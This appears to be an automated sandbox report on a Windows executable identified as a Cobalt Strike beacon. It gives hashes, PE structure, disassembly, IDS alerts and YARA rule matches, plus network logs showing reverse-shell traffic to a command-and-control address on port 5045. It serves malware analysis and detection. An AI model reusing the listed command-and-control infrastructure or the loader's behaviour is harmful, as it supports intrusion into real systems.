              Encrypted:false
              SSDEEP:6:kKNi9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:7DImsLNkPlE99SNxAhUe/3
              MD5:038A9B4AA971D3409D883D136BEA216C
              SHA1:D44D6C76E44CAA9A1E49785192504541C654013F
              SHA-256:4E2A385DCE43B1B1307264A22B6046CC960ADD08FE0A8B525C651026A68CB8B3
              SHA-512:4CC79FDBAF8E1AA1C9B302C7ADE126303A5E7EEE2AB5AD0CDB4F267B7E30A180DE481AFAA8145BD57633EC028A3323248BF65D0E6839985FA34967CC1D139FDA
              Malicious:false
              Reputation:low
              Preview:p...... ...........!.[..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

              Static File Info

              General

              File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
              Entropy (8bit):7.210541561725813
              TrID:
              • Win64 Executable (generic) (12005/4) 74.80%
              • Generic Win/DOS Executable (2004/3) 12.49%
              • DOS Executable Generic (2002/1) 12.47%
              • VXD Driver (31/22) 0.19%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
              File name:2VsJzzWTpA.exe
              File size:328'704 bytes
              MD5:791bbe51360bb7afbe10c8daf7ad6b5c
              SHA1:8f6382479337d8dc829865d72ba6ea02144e0d92
              SHA256:879a5b13745db634a276624a5c476ede618ba844da42d3ec614aafc45051d474
              SHA512:cbf36ccd7528bc05ed718143aa7613c7b665107192af0409bfe8ad7752bff4c79b7242607b4963fe84167c88aa63d9f2fe756d6ea00f85e6a613b421224479af
              SSDEEP:6144:W9jBse4AtsF8zdciLQkln3l0DxUwqemL4E9UMAwu9J:QlN4p8wcn+6wqemLlqd9
              TLSH:73648C71BB4D6FF2D23F3AB5C5732829004FE0DC1B10A60D74AE66DF659261836A27E1
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./...."."....................@..............................p......_......... ............................

              File Icon

              Icon Hash:90cececece8e8eb0

              Static PE Info

              General

              Entrypoint:0x4014c0
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
              DLL Characteristics:
              Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
              TLS Callbacks:0x401ba0
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:147442e63270e287ed57d33257638324

              Entrypoint Preview

              Instruction
              dec eax
              sub esp, 28h
              dec eax
              mov eax, dword ptr [0004EFF5h]
              mov dword ptr [eax], 00000001h
              call 00007F46511EE72Fh
              call 00007F46511EDF1Ah
              nop
              nop
              dec eax
              add esp, 28h
              ret
              nop word ptr [eax+eax+00000000h]
              nop dword ptr [eax]
              dec eax
              sub esp, 28h
              dec eax
              mov eax, dword ptr [0004EFC5h]
              mov dword ptr [eax], 00000000h
              call 00007F46511EE6FFh
              call 00007F46511EDEEAh
              nop
              nop
              dec eax
              add esp, 28h
              ret
              nop word ptr [eax+eax+00000000h]
              nop dword ptr [eax]
              dec eax
              sub esp, 28h
              call 00007F46511EFBC4h
              dec eax
              test eax, eax
              sete al
              movzx eax, al
              neg eax
              dec eax
              add esp, 28h
              ret
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              dec eax
              lea ecx, dword ptr [00000009h]
              jmp 00007F46511EE249h
              nop dword ptr [eax+00h]
              ret
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              dec eax
              jmp ecx
              dec eax
              arpl word ptr [00002AC2h], ax
              test eax, eax
              jle 00007F46511EE298h
              cmp dword ptr [00002ABBh], 00000000h
              jle 00007F46511EE28Fh
              dec eax
              mov edx, dword ptr [00052CFEh]
              dec eax
              mov dword ptr [ecx+eax], edx
              dec eax
              mov edx, dword ptr [00052CFBh]

              Data Directories

              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x540000x8d8.idata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x510000x2b8.pdata
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x500600x28.rdata
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x542240x1e8.idata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x20a80x2200ba98beafce4128c14539a20f3e854b25False0.5734145220588235data6.010394259460846IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .data0x40000x4bcf00x4be003657df1c0b88083fa5395ad85b6c1710False0.6237354561367381dBase III DBT, version number 0, next free block index 10, 1st item "\326+Q\031\326+Q\031\326+Q\031\326\300R\031\246+Q\031\326+Q\031\326+Q\031\326\013R\031\246-Q\031\326+Q\031\326+Q\031\326+Q\031\326+Q\031\326+Q\031\326+Q\031\370_4a\242+Q\031T*R\031\326;Q\031\326)R\031\326/Q\031\326+Q\031\326+Q\031\326+Q\031\366+Qy\370Y5x\242JQ\031\324\327Q\031\326\013R\031\326\325Q\031\326-R\031\326+Q"7.200243030330314IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rdata0x500000x9100xa005fcc7830b4dcd602b35eeb7f1712e8faFalse0.241796875data4.459688665734325IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
              .pdata0x510000x2b80x400f88aef14dea168f37249daf0dce04c78False0.37890625data3.2311971178670404IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
              .xdata0x520000x2380x4006ce9e303fb86766d702ecb2b174cf348False0.2578125data2.6337753778508075IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
              .bss0x530000x9d00x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .idata0x540000x8d80xa003aae8d98b4d34bad008e73a14573bffdFalse0.323828125data3.966749721413537IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .CRT0x550000x680x20052d79e9aecf5d5c3145d3ec54aa197a8False0.0703125data0.2709192282599745IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .tls0x560000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

              Imports

              DLLImport
              KERNEL32.dllCloseHandle, ConnectNamedPipe, CreateFileA, CreateNamedPipeA, CreateThread, DeleteCriticalSection, EnterCriticalSection, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetLastError, GetModuleHandleA, GetProcAddress, GetStartupInfoA, GetSystemTimeAsFileTime, GetTickCount, InitializeCriticalSection, LeaveCriticalSection, QueryPerformanceCounter, ReadFile, RtlAddFunctionTable, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, SetUnhandledExceptionFilter, Sleep, TerminateProcess, TlsGetValue, UnhandledExceptionFilter, VirtualAlloc, VirtualProtect, VirtualQuery, WriteFile
              msvcrt.dll__C_specific_handler, __getmainargs, __initenv, __iob_func, __lconv_init, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _cexit, _fmode, _initterm, _onexit, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, signal, sprintf, strlen, strncmp, vfprintf

              Network Behavior

              Suricata IDS Alerts

              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
              2025-01-01T02:04:38.651886+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.449730134.175.121.1535045TCP
              2025-01-01T02:04:40.182365+01002035651ET MALWARE Meterpreter or Other Reverse Shell SSL Cert1134.175.121.1535045192.168.2.449730TCP
              2025-01-01T02:05:41.997698+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.452520134.175.121.1535045TCP
              2025-01-01T02:06:43.735723+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.452760134.175.121.1535045TCP

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Jan 1, 2025 02:04:37.744956017 CET497305045192.168.2.4134.175.121.153
              Jan 1, 2025 02:04:37.751998901 CET504549730134.175.121.153192.168.2.4
              Jan 1, 2025 02:04:37.752088070 CET497305045192.168.2.4134.175.121.153
              Jan 1, 2025 02:04:37.761851072 CET497305045192.168.2.4134.175.121.153
              Jan 1, 2025 02:04:37.768132925 CET504549730134.175.121.153192.168.2.4
              Jan 1, 2025 02:04:38.651818991 CET504549730134.175.121.153192.168.2.4
              Jan 1, 2025 02:04:38.651885986 CET497305045192.168.2.4134.175.121.153
              Jan 1, 2025 02:04:38.979347944 CET504549730134.175.121.153192.168.2.4
              Jan 1, 2025 02:04:38.979398012 CET497305045192.168.2.4134.175.121.153
              Jan 1, 2025 02:04:40.177510977 CET497305045192.168.2.4134.175.121.153
              Jan 1, 2025 02:04:40.182364941 CET504549730134.175.121.153192.168.2.4
              Jan 1, 2025 02:04:40.495101929 CET504549730134.175.121.153192.168.2.4
              Jan 1, 2025 02:04:40.495177031 CET497305045192.168.2.4134.175.121.153
              Jan 1, 2025 02:04:40.767712116 CET504549730134.175.121.153192.168.2.4
              Jan 1, 2025 02:04:40.767765999 CET497305045192.168.2.4134.175.121.153
              Jan 1, 2025 02:04:40.770632982 CET497305045192.168.2.4134.175.121.153
              Jan 1, 2025 02:04:40.775460005 CET504549730134.175.121.153192.168.2.4
              Jan 1, 2025 02:04:41.088449955 CET504549730134.175.121.153192.168.2.4
              Jan 1, 2025 02:04:41.088640928 CET504549730134.175.121.153192.168.2.4
              Jan 1, 2025 02:04:41.088643074 CET497305045192.168.2.4134.175.121.153
              Jan 1, 2025 02:04:41.088689089 CET497305045192.168.2.4134.175.121.153
              Jan 1, 2025 02:05:10.702785969 CET5248953192.168.2.4162.159.36.2
              Jan 1, 2025 02:05:10.707655907 CET5352489162.159.36.2192.168.2.4
              Jan 1, 2025 02:05:10.707719088 CET5248953192.168.2.4162.159.36.2
              Jan 1, 2025 02:05:10.712645054 CET5352489162.159.36.2192.168.2.4
              Jan 1, 2025 02:05:11.161652088 CET5248953192.168.2.4162.159.36.2
              Jan 1, 2025 02:05:11.166604996 CET5352489162.159.36.2192.168.2.4
              Jan 1, 2025 02:05:11.166650057 CET5248953192.168.2.4162.159.36.2
              Jan 1, 2025 02:05:41.102159977 CET525205045192.168.2.4134.175.121.153
              Jan 1, 2025 02:05:41.107044935 CET504552520134.175.121.153192.168.2.4
              Jan 1, 2025 02:05:41.107129097 CET525205045192.168.2.4134.175.121.153
              Jan 1, 2025 02:05:41.107368946 CET525205045192.168.2.4134.175.121.153
              Jan 1, 2025 02:05:41.112158060 CET504552520134.175.121.153192.168.2.4
              Jan 1, 2025 02:05:41.112288952 CET504552520134.175.121.153192.168.2.4
              Jan 1, 2025 02:05:41.997642994 CET504552520134.175.121.153192.168.2.4
              Jan 1, 2025 02:05:41.997698069 CET525205045192.168.2.4134.175.121.153
              Jan 1, 2025 02:05:42.269990921 CET504552520134.175.121.153192.168.2.4
              Jan 1, 2025 02:05:42.270060062 CET525205045192.168.2.4134.175.121.153
              Jan 1, 2025 02:05:42.270380020 CET525205045192.168.2.4134.175.121.153
              Jan 1, 2025 02:05:42.275443077 CET504552520134.175.121.153192.168.2.4
              Jan 1, 2025 02:05:42.322798014 CET525205045192.168.2.4134.175.121.153
              Jan 1, 2025 02:05:42.327600956 CET504552520134.175.121.153192.168.2.4
              Jan 1, 2025 02:05:42.815784931 CET504552520134.175.121.153192.168.2.4
              Jan 1, 2025 02:05:42.815840006 CET525205045192.168.2.4134.175.121.153
              Jan 1, 2025 02:05:42.815937042 CET504552520134.175.121.153192.168.2.4
              Jan 1, 2025 02:05:42.815973997 CET525205045192.168.2.4134.175.121.153
              Jan 1, 2025 02:06:27.726991892 CET525205045192.168.2.4134.175.121.153
              Jan 1, 2025 02:06:27.732144117 CET504552520134.175.121.153192.168.2.4
              Jan 1, 2025 02:06:27.743396044 CET497305045192.168.2.4134.175.121.153
              Jan 1, 2025 02:06:28.054816008 CET497305045192.168.2.4134.175.121.153
              Jan 1, 2025 02:06:28.664174080 CET497305045192.168.2.4134.175.121.153
              Jan 1, 2025 02:06:29.867305994 CET497305045192.168.2.4134.175.121.153
              Jan 1, 2025 02:06:32.273555994 CET497305045192.168.2.4134.175.121.153
              Jan 1, 2025 02:06:37.086045027 CET497305045192.168.2.4134.175.121.153
              Jan 1, 2025 02:06:42.821366072 CET527605045192.168.2.4134.175.121.153
              Jan 1, 2025 02:06:42.826366901 CET504552760134.175.121.153192.168.2.4
              Jan 1, 2025 02:06:42.826435089 CET527605045192.168.2.4134.175.121.153
              Jan 1, 2025 02:06:42.826683998 CET527605045192.168.2.4134.175.121.153
              Jan 1, 2025 02:06:42.831445932 CET504552760134.175.121.153192.168.2.4
              Jan 1, 2025 02:06:43.735660076 CET504552760134.175.121.153192.168.2.4
              Jan 1, 2025 02:06:43.735723019 CET527605045192.168.2.4134.175.121.153
              Jan 1, 2025 02:06:44.012104988 CET504552760134.175.121.153192.168.2.4
              Jan 1, 2025 02:06:44.012181997 CET527605045192.168.2.4134.175.121.153
              Jan 1, 2025 02:06:44.012512922 CET527605045192.168.2.4134.175.121.153
              Jan 1, 2025 02:06:44.013806105 CET527605045192.168.2.4134.175.121.153
              Jan 1, 2025 02:06:44.017297029 CET504552760134.175.121.153192.168.2.4
              Jan 1, 2025 02:06:44.018644094 CET504552760134.175.121.153192.168.2.4
              Jan 1, 2025 02:06:44.566857100 CET504552760134.175.121.153192.168.2.4
              Jan 1, 2025 02:06:44.567022085 CET527605045192.168.2.4134.175.121.153
              Jan 1, 2025 02:06:44.567081928 CET504552760134.175.121.153192.168.2.4
              Jan 1, 2025 02:06:44.567132950 CET527605045192.168.2.4134.175.121.153
              Jan 1, 2025 02:06:46.695494890 CET497305045192.168.2.4134.175.121.153

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Jan 1, 2025 02:05:10.702302933 CET5350058162.159.36.2192.168.2.4
              Jan 1, 2025 02:05:11.170135975 CET5852153192.168.2.41.1.1.1
              Jan 1, 2025 02:05:11.177144051 CET53585211.1.1.1192.168.2.4

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Jan 1, 2025 02:05:11.170135975 CET192.168.2.41.1.1.10x9165Standard query (0)198.187.3.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Jan 1, 2025 02:04:39.348314047 CET1.1.1.1192.168.2.40x551bNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
              Jan 1, 2025 02:04:39.348314047 CET1.1.1.1192.168.2.40x551bNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
              Jan 1, 2025 02:04:54.730293036 CET1.1.1.1192.168.2.40x9c3fNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
              Jan 1, 2025 02:04:54.730293036 CET1.1.1.1192.168.2.40x9c3fNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
              Jan 1, 2025 02:05:11.177144051 CET1.1.1.1192.168.2.40x9165Name error (3)198.187.3.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              System Behavior

              General

              Target ID:0
              Start time:20:04:35
              Start date:31/12/2024
              Path:C:\Users\user\Desktop\2VsJzzWTpA.exe
              Wow64 process (32bit):false
              Commandline:"C:\Users\user\Desktop\2VsJzzWTpA.exe"
              Imagebase:0x400000
              File size:328'704 bytes
              MD5 hash:791BBE51360BB7AFBE10C8DAF7AD6B5C
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
              • Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: @VK_Intel
              • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
              • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
              • Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: @VK_Intel
              • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: ditekSHen
              • Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: ditekSHen
              Reputation:low
              Has exited:false

              Disassembly

              Reset < >

                Execution Graph

                Execution Coverage:1.9%
                Dynamic/Decrypted Code Coverage:100%
                Signature Coverage:11.5%
                Total number of Nodes:314
                Total number of Limit Nodes:19
                execution_graph 37299 4014c0 37304 401990 37299->37304 37301 4014d6 37308 401180 37301->37308 37303 4014db 37305 4019d0 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 37304->37305 37306 4019b9 37304->37306 37307 401a2b 37305->37307 37306->37301 37307->37301 37309 401460 GetStartupInfoA 37308->37309 37310 4011b4 37308->37310 37316 4013b4 37309->37316 37311 4011e1 Sleep 37310->37311 37312 4011f6 37310->37312 37311->37310 37313 401229 37312->37313 37314 40142c _initterm 37312->37314 37312->37316 37326 401fd0 37313->37326 37314->37313 37316->37303 37317 401251 SetUnhandledExceptionFilter 37346 4024e0 37317->37346 37319 40130e malloc 37321 401335 37319->37321 37322 40137b 37319->37322 37320 40126d 37320->37319 37323 401340 strlen malloc memcpy 37321->37323 37352 403040 37322->37352 37323->37323 37324 401376 37323->37324 37324->37322 37331 402008 37326->37331 37345 401ff2 37326->37345 37327 402240 37329 40223a 37327->37329 37327->37345 37328 4021ce 37333 40228c 37328->37333 37357 401dc0 8 API calls 37328->37357 37329->37327 37329->37333 37359 401dc0 8 API calls 37329->37359 37330 4022a8 37361 401d50 8 API calls 37330->37361 37331->37327 37331->37328 37331->37330 37341 4020b0 37331->37341 37331->37345 37360 401d50 8 API calls 37333->37360 37338 402208 37358 401dc0 8 API calls 37338->37358 37339 4022b4 37339->37317 37340 401dc0 8 API calls 37340->37341 37341->37328 37341->37333 37341->37338 37341->37340 37342 402156 37341->37342 37343 402160 37341->37343 37342->37343 37344 402192 VirtualProtect 37343->37344 37343->37345 37344->37343 37345->37317 37348 4024ef 37346->37348 37347 40251c 37347->37320 37348->37347 37362 402a80 strncmp 37348->37362 37350 402517 37350->37347 37351 4025c5 RtlAddFunctionTable 37350->37351 37351->37347 37353 40304a 37352->37353 37363 4017f8 GetTickCount 37353->37363 37356 403058 SleepEx 37356->37356 37357->37338 37358->37329 37359->37329 37360->37330 37361->37339 37362->37350 37364 402e28 37363->37364 37365 401866 CreateThread 37364->37365 37366 4017a6 malloc 37365->37366 37381 4016e6 37365->37381 37367 4017c8 SleepEx 37366->37367 37373 401704 CreateFileA 37367->37373 37370 4017de 37378 401595 VirtualAlloc 37370->37378 37372 4017ed 37372->37356 37374 40179c 37373->37374 37375 40175e 37373->37375 37374->37367 37374->37370 37376 401781 CloseHandle 37375->37376 37377 